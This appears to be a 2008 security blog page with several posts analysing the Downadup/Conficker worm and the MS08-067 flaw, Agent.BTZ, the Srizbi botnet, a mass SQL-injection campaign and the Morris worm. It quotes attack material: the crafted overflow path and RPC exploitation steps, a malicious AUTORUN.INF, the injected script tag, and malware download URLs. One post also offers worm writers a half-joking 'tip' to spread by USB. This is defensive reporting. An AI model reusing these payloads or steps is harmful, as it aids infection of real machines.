New Kid on the Block: Downadup

Share

Many reports on the last few days mention a new worm growing on the back of the Windows’ MS08-067 vulnerability. The worm named Downadup, also being dubbed Conficker.A by Microsoft, as now spread to alarming levels: “We think 500,000 is a ball park figure” said Ivan Macalintal, a senior research engineer with Trend Micro Inc[1].

The Exploit

The vulnerability is located in the Windows Server service, which is used to share networks files and printers across computers on a Windows network. This service is used by all Windows versions, even the Windows 7 Pre-Beta version, therefore making every Windows user vulnerable unless patched[2]:

Microsoft Windows 2000 Service Pack 4 Windows Server 2003 with SP1 for Itanium-based Systems
Windows XP Service Pack 2 Windows Server 2003 with SP2 for Itanium-based Systems
Windows XP Service Pack 3 Windows Vista and Windows Vista Service Pack 1
Windows XP Professional x64 Edition Windows Vista x64 Edition and Windows Vista x64 Edition Service Pack 1
Windows XP Professional x64 Edition Service Pack 2 Windows Server 2008 for 32-bit Systems*
Windows Server 2003 Service Pack 1 Windows Server 2008 for x64-based Systems*
Windows Server 2003 Service Pack 2 Windows Server 2008 for Itanium-based Systems
Windows Server 2003 x64 Edition Windows Server 2003 x64 Edition Service Pack 2

Vulnerable Operating System by the MS08-67 Exploit

The exploit is executed by sending a specially crafted packet to the RPC (Remote Procedure Call) interface. The interface could be reach by an attacker if there are no firewalls activated or if the File/Printer sharing options is enabled and connected to the Internet. The packet will cause a buffer overflow which allows arbitrary code to be executed.

The core of the exploit comes from a buffer overflow created when parsing a specific path. The exploit occurs when specially crafted packet is sent to port 139 or 445 on a Windows file/printer sharing session. The reception of that package will trigger a call to the RPC API NetPathCompare() and NetPathCanonicalize() functions.

The exploit is triggered when giving a specific path to canonicalize, such as “\c\..\..\AAAAAAAAAAAAAAAAAAAAAAAAAAAAA”[3] to the NetPathCanonicalize function, which uses the _tcscpy_s macro, which in turns calls the wcscpy_s function[4]. This function is used to copy a wide-character string from a location in memory to another. The buffer overflow is provoked by a miscalculation in the parameters given to the _tcscpy_s macro by the NetPathCanonicalize() function.

The _tcspy_s function is called like this by the NetPathCanonicalize:

_tcscpy_s(previousLastSlash, pBufferEnd – previousLastSlash, ptr + 2);

NetPathCanonicalize contains a complex loop to check the path for dots, dot-dots, slashes while making a lot of pointer calculations. Once the loop is passed over a couple of time, the previousLastSlash parameter gets an illegal value.

The RPC call

To exploit this vulnerability, all one have to do is to bind with the SRVSVC pipe of the Windows Server Service, which is the RPC interface and bind with it. If this is successful, a call to the NetPathCanonicalize()function with a specially crafted path as shown above, is done, then it’s only a matter of providing the payload. Exploits are already public on sites such as milw0rm[5].

The New Worm: Downadup

Downadup is the new worm to use the exploit on a large scale and has proved to be widely successful even if it’s already been one month since the vulnerability was found and patched.

Once installed on a system, the worm will copy itself with a random name into the system directory %systemroot%\system32 and register itself as a service[6]. It will, of course, also add itself into the registry with the following key:

  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\<name>.dll
    ImagePath = %SystemRoot%\system32\svchost.exe -k netsvcs
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\netsvcs\Parameters\”ServiceDll” = “<name>.dll”

It will then use those sites to get the newly infected machine’s IP address:

  • http://www.getmyip.org
  • http://getmyip.co.uk
  • http://checkip.dyndns.org

With the IP address, Downadup can download a small HTTP server (“http://trafficconverter.biz/4vir/antispyware/loadadv.exe“) and open a HTTP server on the current machine with the following address[7]:

http://[EXTERNAL IP ADDRESS OF INFECTED MACHINE]:[RANDOM PORT]

Once the HTTP server is set up, it will scan for other vulnerable machines and when a target is found, the infected machine URL will be sent to the target as the payload. The remote computer will then download the worm from the URL given and then start to infect other machines as well. Therefore, there is no centralized point of download. Upon successful infection, it will also patch the hole to prevent other worms to infect the machine[8].

According to Symantec, it has a domain name generating algorithm based on dates just like the Srizbi has (see Srizbi is back for more details on the algorithm). It also deletes any prior Restore Points saved by the user or the system[9].

Add to FacebookAdd to NewsvineAdd to DiggAdd to Del.icio.usAdd to StumbleuponAdd to RedditAdd to BlinklistAdd to Ma.gnoliaAdd to TechnoratiAdd to Furl


[1] “New Windows worm builds massive botnet”, Gregg Keizer, ComputerWorld, December 1, 2008, http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9121958 (accessed on December 1, 2008)

[2] “Microsoft Security Bulletin MS08-067 – Critical”, Microsoft, October 23, 2008, http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx (accessed on December 2, 2008)

[3] “Gimmiv.A exploits critical vulnerability (MS08-067)”, Sergei Shevchenko, October 23, 2008, http://blog.threatexpert.com/2008/10/gimmiva-exploits-zero-day-vulnerability.html (accessed December 2, 2008)

[4] “MS08-067 and the SDL”, The Security Development Lifecycle, October 22, 2008, http://blogs.msdn.com/sdl/archive/2008/10/22/ms08-067.aspx (accessed on December 2, 2008)

[5] See MS08-067 Exploit by Debasis Mohanty and MS08-067 Remote Stack Overflow Vulnerability Exploit for examples.

[6] “F-Secure Malware Information Pages: Worm:W32/Downadup.A”, F-Secure Corporation, November 26, 2008, http://www.f-secure.com/v-descs/worm_w32_downadup_a.shtml (accessed on December 2, 2008)

[7] “W32.Downadup”, Symantec, Takayoshi Nakayama and Sean Kiernan, November 24, 2008, http://www.symantec.com/security_response/writeup.jsp?docid=2008-112203-2408-99&tabid=2 (accessed on December 2, 2008)

[8] “Microsoft warns of new Windows attacks”, Gregg Keizer, ComputerWorld, December 1, 2008, http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9121958 (accessed on December 2, 2008)

[9] “Worm:Win32/Conficker.A”, Joshua Phillips, Microsoft Malware Protection Center, 2008, http://www.microsoft.com/security/portal/Entry.aspx?Name=Worm%3aWin32%2fConficker.A (accessed on December 2, 2008)

LATimes: Agent.BTZ Might be Concerted Cyber-Attack

Share

The Los Angeles Times reports that the reports about the Agent.BTZ worm spreading to the U.S Army networks might be a coordinated attacks originating from Russia[1].

The U.S Central Command is now infected with the worm and a high-classified network has been hit also.

It is unclear if the author of the article thinks that an infection is the same things as an ‘attack’ though. From the article:

“Military electronics experts have not pinpointed the source or motive of the attack and could not say whether the destructive program was created by an individual hacker or whether the Russian government may have had some involvement.”

This infection has been report at the beginning of the month. This might just be sensationalism ofrcomplete ignorance from the author who might think than an infection by a worm made in Russia is a deliberate attack.

Officials would not describe the exact threat from agent.btz, or say whether it could shut down computers or steal information. Some computer experts have reported that agent.btz can allow an attacker to take control of a computer remotely and to take files and other information from it.

Then maybe they should just call Symantec or F-Secure or even better, Google it…or this if they are having a hard time..

See also:

“U.S Army Infected by Worm”, Jonathan Racicot, Cyberwarfare Magazine, November 11, 2008, http://cyberwarfaremag.wordpress.com/2008/11/20/us-army-infected-by-worm/

Add to FacebookAdd to NewsvineAdd to DiggAdd to Del.icio.usAdd to StumbleuponAdd to RedditAdd to BlinklistAdd to Ma.gnoliaAdd to TechnoratiAdd to Furl


[1] “Cyber-attack on Defense Department computers raises concerns”, Julian E. Barnes, Los Angeles Times,  November 28, 2008, http://www.latimes.com/news/nationworld/iraq/complete/la-na-cyberattack28-2008nov28,0,230046.story (accessed on November 28, 2008)

Srizbi is back

Share

Update: The new Estonian company that hosted the command & control server, Starline Web Services, was shut down. The domain name chase continues !

The Srizbi botnet is back online after being shut down by the closure of the criminal hosting company McColo Corp two weeks ago. Srizbi’s command and controls servers, now moved to an Estonian hosting provider, took back control of the botnet[1] in the last days.

The Srizbi Botnet

The Srizbi botnet is mostly a spam generating botnet. According to security firm FireEye, there are 50 variants of the bot, which controls altogether around 500 000 zombies across the world[2]. The most virulent forms of Srizbi are said to control around 50 000 bots.

The Srizbi botnet had a backup procedure in case its C&C servers went down, that is why it got back online very fast. Included in the bot, is a procedure that generates domain names[3] and tries to contact it to see if the C&C is available. Therefore the owners, knowing the random-generating domain name algorithm of the botnet, only had to register one or more of the domain names that will be generated by the bots and install their new control and command server on a machine registered a valid domain name. That is enough for bots to download a new version, pointing to a new address for the botnet. To explain it using pseudo-code, it would look something like this:

More information can be found about the random name generation algorithm at FireEye[4]. Interesting enough, the algorithm is based on date to generate a new set of possible domains names by period. FireEye had successfully discovered this function after McColo closed, but due to financial constraint, they could not register all the domain names that the bot generated. That would have implied to register more than 450 domains each week…

We have registered a couple hundred domains,” Fengmin Gong, chief security content officer at FireEye Inc., “but we made the decision that we cannot afford to spend so much money to keep registering so many [domain] names.[5]

Communications intercepted between a Srizbi bot and its Command and Control Server
Communications intercepted between a Srizbi bot and its Command and Control Server

According to the Symantec Srizbi webpage[6], the worm creates windbg48.sys and another randomly named .SYS file in the %SYSTEM% folder. It then registers the wingdbg48.sys as a driver by inserting the hidden HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\windbg48 key into the Windows’ Registry. Srizbi hides those keys by running in Kernel mode and hooking the ZwOpenKey and ZwEnumerateKey kernel functions among others. It might also try to block access to the registry. A tool is available in order to access the registry anyway.

It will also hide its files by hooking the NTFS file system driver. As if it was not enough, it will also modify the TCP/IP network drivers to bypass Firewalls and Intrusion Detection systems. It will also work in Safe Mode.

For those who wish to go deeper, Windows has two levels of execution: user mode and kernel mode. Usually applications run in user mode, which protects the kernel from applications so they won’t mess up the system. Kernel mode is a privilege mode where services and drivers have access to system resources such as the processor but also the memory… Hooking kernel functions is done by redirecting calls made to the kernel to a custom function. There are a couple of ways to do that in kernel mode, and one of them is to alter the System Service Descriptor Table, which is a table that maps every kernel function to an address in memory. By modifying this table to the address of your custom function, you could hook the kernel. This however would be easily detected by any anti-virus.

Another way is to insert an unconditional jump instruction into the kernel function by modifying the function directly in memory. The advantage of this method is that it’s much harder to detect, and can reproduce the same functionality of the hooked function. This is called inline function hooking.

This why this Trojan can also work in Safe Mode. I don’t know if this particular Trojan uses inline function hooking, but rootkits that uses this kind of hooking are quite hard and dangerous to remove.

Return of Srizbi

When McColo Corp. closed two weeks ago following and investigation by the Washington Post’s Security Fix, it made the news across the Internet as this hosting company was considered responsible for around 75 percent of all the spam sent across the web. Although many rejoiced, including me, at the sudden drop of spam as soon as McColo was turn off[7], everyone knew it was only temporary before the cyber criminals would found another hosting company.

Few knew that this random domain name generating routine was coded to connect to another C&C server though. As soon as it came back online, the first command it received was for a Russian spam campaign. By generating domain names such as yrytdyip.com, auaopagr.com, qpqduqud.com or ydywryfu.com, it was unthinkable for FireEye to register every possibility generated by Srizbi. It is becoming harder and harder to fight botnets on a technical basic. Fortunately, the economic fight could maybe put an end to spam, as mentioned in this Ars Technica article:

“… it suggests that spammers may be extremely sensitive to costs-more so than was previously believed. Even a small increase in the cost of sending an e-mail, they postulate, could have significant ramifications for the botnet industry, and might slow the rate at which it grows or put some spam operations out of business altogether.[8]

The Rustock, Cutwail and Asprox botnets are also making a come back[9], provoking a new surge in spam in the last few days, but not quite yet at the same level of the pre-McColo era.

See also:

Windows Rootkits of 2005, Part One“, James Butler, Sherri Sparks, Security Focus, November 4, 2005, http://www.securityfocus.com/infocus/1850, (accessed on November 27, 2008)

Fallback C&C channels“, Alex Lanstein, Atif Mushtaq, Julia Wolf, and Todd Rosenberry, FireEye, November 16, 2008,  http://blog.fireeye.com/research/2008/11/fallback-cc-channels-part-deux.html#more (accessed on November 27, 2008)


[1] “Massive botnet returns from the dead, starts spamming”, Gregg Keizer, ComputerWorld, November 26, 2008, http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9121678 (accessed on November 27, 2008)

[2] “Srizbi Botnet Re-Emerges Despite Security Firm’s Efforts”, Brian Krebs, Washington Post – Security Fix, November 26, 2008, http://voices.washingtonpost.com/securityfix/2008/11/srizbi_botnet_re-emerges_despi.html?hpid=news-col-blogs (accessed on November 27, 2008)

[3] “Technical details of Srizbi’s domain generation algorithm”, Julia Wolf, November 25, 2008, http://blog.fireeye.com/research/2008/11/technical-details-of-srizbis-domain-generation-algorithm.html (accessed on November 27, 2008)

[4] Ibid.

[5] “Massive botnet returns from the dead, starts spamming”, Gregg Keizer, ComputerWorld, November 26, 2008, http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9121678 (accessed on November 27, 2008)

[6] “Trojan.Srizbi”, Kaoru Hayashi, Symantec, July 23, 2007, http://www.symantec.com/security_response/writeup.jsp?docid=2007-062007-0946-99&tabid=2 (accessed on November 27, 2008)

[7] “Spam plummets after Calif. hosting service shuttered”, Gregg Keizer, ComputerWorld Security, http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9119963 (accessed on November 27, 2008)

[8] “Study: Storm botnet brought in daily profits of up to $9,500”, Joel Hruska, Ars Technica, November 10, 2008, http://arstechnica.com/news.ars/post/20081110-study-storm-botnet-brought-in-daily-profits-of-up-to-9500.html (accessed on November 27, 2008)

[9] “Srizbi botnet active again”, Jeremy Kirk, November 27, 2008, http://www.itworldcanada.com/a/Departmental-and-End-User-Computing/7167ba6c-1cd2-4c54-9338-95a63bea47fa.html (accessed on November 27, 2008)

U.S Army Infected by Worm

Share

Wired reports that the U.S Army network is under assault by a variant of the SillyFDC worm called Agent-BTZ [1]. In order to restrain the infection, the U.S. Strategic Command has ban the use of every portable media on its network, this include USB keys, CDs, flash cards, floppies etc… Both the SIPRNet and NIPRNet are affected by this directive.

The SillyFDC worm infects systems through replication, i.e. by copying itself to various locations such as these folders[2]:

  • %System%
  • %Windir%
  • %Temp%
  • %UserProfile%
  • %ProgramFiles%
  • %SystemDrive%
  • %CommonProgramFiles%
  • %CurrentFolder%

Computer Virus Looming
Computer Virus Looming

It will also try to copy itself to any drive connected to the machine by scanning drives A:\ to Z:\, which is why the U.S Army is banning the use of portable media for the time being.  According to F-Secure who first discovered the worm[3], the variant in question will also create these files[4]:

  • %windir%\system32\muxbde40.dll
  • %windir%\system32\winview.ocx
  • %temp%\6D73776D706461742E746C62FA.tmp
  • %windir%\system32\mswmpdat.tlb

It will then install itself into the registry to make sure the worm starts every time the computer is booted. It will also attempt to download a JPG file from http://worldnews.ath.cx/update/img0008/[REMOVED].jpg and create an AUTORUN.INF file on each drive on the computer, which contains the following:

[autorun]
open=
shell\open=Explore
shell\open\Command=rundll32.exe .\\[RANDOM].dll,InstallM
shell\open\Default=1

[RANDOM] is a randomly generated filename for the malicious DLL. Each time a new partition or a new drive is plugged in, Agent.BTZ will infect it immediately.

The SillyFDC worm doesn’t have any payload, as it only replicates itself through systems it finds using physical medias only. But its variant, the Agent.BTZ is a known Trojan dropper. A dropper is the kind of Trojan that will look to download and execute other malware. It’s surprising that it found its way into the U.S Army network. So that might be a tip for any worm/Trojan writer: add physical media replication to your malware like in the good ol’ days before e-mail, as it seems sending it by e-mail or click jacking is pretty well filtered in military networks, but peripherals such as USB keys are still often used by personnel. And this will surely open the eyes of the network admins of the U.S Army: scan anything plugged into the network.

Also, Graham Cluley, senior technology consultant at Sophos advises:

“… that users disable the autorun facility of Windows so removable devices such as USB keys and CD ROMs do not automatically launch when they are attached to a PC”

With whom I agree.

Update:

Since so many people asked me about this worm, I looked deeply into Internet and found this code, which seems to be part of the script of the Silly FDC worm (that’s the best I could do for now). This script basically copy files from one directory to another, renames the core of the worm and put it into another directory and add registry keys. I cannot confirm this as I found this on an Indonesian blog, so if anyone can look into this, please let me know. Thank you. Blog : http://morphians.wordpress.com/category/uncategorized/

See also:

“US Army bans USB devices to contain worm”, John Leyden, The Register, November 20, 2008, http://www.theregister.co.uk/2008/11/20/us_army_usb_ban/ (accessed on November 20, 2008)


[1] “Under Worm Assault, Military Bans Disks, USB Drives”, Noah Shachtman, Danger Room, Wired, http://blog.wired.com/defense/2008/11/army-bans-usb-d.html (accessed on November 20, 2008)

[2] “W32.SillyFDC”, Symantec, http://securityresponse.symantec.com/security_response/writeup.jsp?docid=2006-071111-0646-99&tabid=1 (accessed on November 20, 2008)

[3] “Troj/Agent-EMB”, Sophos, http://www.sophos.com/security/analyses/viruses-and-spyware/trojagentemb.html (accessed on November 20, 2008)

[4] “F-Secure Malware Information Pages: Worm:W32/Agent.BTZ”, F-Secure Corporation, http://www.f-secure.com/v-descs/worm_w32_agent_btz.shtml (accessed on November 20, 2008)

New Cyber Attack on the Way

Share

A new SQL Injection tool is being used to conduct a mass cyber attack on various servers across the net. It has already attacked websites such as Travelocity.com, countyofventura.org and missouri.edu[1]. Websense has observed around 1200 servers from Europe, Asia and the U.S containing the injection.

“Websites being hacked and links placed on them that lead to malicious servers. We’re estimating that in the last two days along, between 2000 and 10,000 servers, mainly Western European and American ones, have been hacked. It’s not yet clear who’s doing this.[2]says an analyst from Viruslist.com.

The targeted websites are usually running an ASP engine and are hacked by using stolen accounts or using SQL injections. The injection add a javascript line at the end of the page: <script src=http://<domain>/h.js>, where <domain> is a domain redirecting to another server called wexe.com. Kaspersky Lab, which has first reported the attack[3], has identified 6 of those domains:

  • armsart.com
  • acglgoa.com
  • idea21.org
  • yrwap.cn
  • s4d.in
  • dbios.org

These servers will retrieve a javascript (h.js) from a Chinese server called wexe.com, which will try various exploits against the victims. If one is found, it will install a variety of Trojans that will try to download even more downloaders, steal World of Warcraft accounts and other private information. All that is done without the user’s knowledge, and could be done from legitimate websites.

Don Jackson, director of threat intelligence for SecureWorks, is saying that his team is currently in talks with the developers of the tools in order to get a copy and reverse-engineer it. Jackson claims that the attacks looks like the same used by the Asprox botnet, but is less aggressive and stealthier. The tool also uses a digital rights management (DRM) system.


[1] “Relentless Web Attack Hard To Kill”, Kelly Jackson Higgins, DarkReading, November 11, 2008, http://www.darkreading.com/security/attacks/showArticle.jhtml?articleID=212001872 (accessed on November 12, 2008)

[2] “Big Chinese Hack 2?”, Viruslist.com, http://www.viruslist.com/en/weblog (accessed on November 13, 2008)

[3] Ibid.

First Internet Worm is 20 years old Sunday

Share

In 1988, the computer world faced a new cyber menace that is still very well alive today. The first computer worm, written by a student called Robert Tappan Morris.

From Wikipedia:

“The original intent, according to him, was to gauge the size of the Internet. He released the worm from the Massachusetts Institute of Technology (MIT) to conceal the fact that it actually originated from Cornell. The worm was designed to count how many machines were connected to the Internet. Unknown to Morris, the worm had a design flaw. The worm was programmed to check each computer it found to determine if the infection was already present. However, Morris believed that some administrators might try to defeat his worm by instructing the computer to report a false positive. To compensate for this possibility, Morris directed the worm to copy itself anyway, fourteen percent of the time, no matter the response to the infection-status interrogation.”

Infection Map of the Code Red Worm
Infection Map of the Code Red Worm

Nowadays, worms are notorious for spreading malicious payloads across the entire Internet. It also known as an extremely efficient cyber weapon to mass exploit vulnerabilities on a large scale. Popular worms include Code Red, in 2001, which infected up to 359 000 machines[1], Klez, Blaster, Sasser are also notorious computer worms. Here is a table of notorious worms from the last decade:

Worm

Year

Damage ($US)

CIH 1998 $20 to $80 million
Melissa 1999 $1 billion
ILoveYou 2000 $5.5 billion to $8.7 billion in damages; ten percent of all Internet-connected computers hit
Code Red 2001 $2 billion; a rate of $200 million in damages per day
SQL Slammer 2003 Shut down South Korea’s online capacity for 12 hours; affected 500,000 servers worldwide
Blaster 2003 between $2 and $10 billion; hundreds of thousands of infected PCs
Sobig 2003 500,000 computers worldwide; as much as $1 billion in lost productivity
Sasser 2004 tens of millions of dollars; shut down the satellite communications for some French news agencies; several Delta airline flights were cancelled; shut down numerous companies’ systems worldwide
MyDoom 2004 Slowed global Internet performance by 10 percent and Web load times by up to 50 percent
Bagle 2004 Tens of millions of dollars

Table 1.0 – Top 10 Computer Worms[2]

See also:

Morris worm turns 20: Look what it’s done“, Carolyn Duffy Marsan, Network World, October 30, 2008, http://www.networkworld.com/news/2008/103008-morris-worm.html?page=1 (accessed October 31, 2008)

Morris Worm To Turn 20 – How Far Things Have Come“, Darknet, October 31, 2008, http://www.darknet.org.uk/2008/10/morris-worm-to-turn-20-how-far-things-have-come/ (accessed October 31, 2008)


[1] “The Spread of the Code-Red Worm (CRv2)”, David Moore, Colleen Shannon, CAIDA, September 14, 2007, http://www.caida.org/research/security/code-red/coderedv2_analysis.xml (accessed October 31, 2008)

[2] “Top 10 worst computer viruses”, George Garza, Catalogs.com, February 17, 2008, http://www.catalogs.com/info/travel-vacations/top-10-worst-computer-viruses.html (accessed October 31, 2008)